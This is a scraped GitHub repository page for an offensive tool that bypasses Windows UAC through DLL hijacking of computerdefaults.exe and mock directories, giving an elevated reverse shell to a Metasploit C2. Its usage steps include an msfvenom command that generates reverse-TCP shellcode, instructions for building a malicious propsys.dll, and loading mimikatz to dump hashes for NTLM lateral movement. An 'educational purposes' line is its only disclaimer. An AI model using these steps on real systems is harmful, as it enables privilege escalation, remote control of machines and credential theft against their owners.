Skip to content

DLL Hijacking and Mock directories technique to bypass Windows UAC security feature and getting high-level privileged reverse shell. Security researchers identified this technique which uses a simplified process of DLL hijacking and mock folders to bypass UAC control. I tested this on Windows 10,11 and bypassed Windows 10 UAC security feature.

License

Notifications You must be signed in to change notification settings

Offensive-Panda/C2_Elevated_Shell_DLL_Hijcking

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

C2_Elevated_Shell_DLL_Hijcking

DLL Hijacking and Mock directories technique to bypass Windows UAC security feature and getting high-level privileged reverse shell. Security researchers identified this technique which uses a simplified process of DLL hijacking and mock folders to bypass UAC control. I tested this on Windows 10,11 and bypassed Windows 10 UAC security feature. I am using Metasploit as a C2 server in order to get reverse shell and “computerdefaults.exe” binary to perform DLL hijacking attack. If an attacker got access of that user than he will escalate privileges in order to dump hashes and try to authenticate within network using NTLM hashes of that user. What if an attacker got elevated reverse shell of user, he don’t need to escalate privileges because he already got administrative shell on C2 server.

USAGE

  1. Create your shellcode using msfvenom (msfvenom -p windows/x64/shell_reverse_tcp lhost=0.0.0.0 lport=555 -f CSharp)
  2. Compile Dllmain.cpp to create malicous DLL and rename propsys.dll
  3. Put propsys.dll and batch file in same directory
  4. Start Metasploit listener before executing batch script.
  5. You will get elevated shell over C2 server.
  6. Load mimikatz in order to dump hashes.

1_QlGStDVsHu1ZemehjNZObQ 1_h-WeaeVpN6P7F5Z6M_kKdA 1_n9Px514ZD_KLLmSu3z4bug

Only for educational purposes.

About

DLL Hijacking and Mock directories technique to bypass Windows UAC security feature and getting high-level privileged reverse shell. Security researchers identified this technique which uses a simplified process of DLL hijacking and mock folders to bypass UAC control. I tested this on Windows 10,11 and bypassed Windows 10 UAC security feature.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published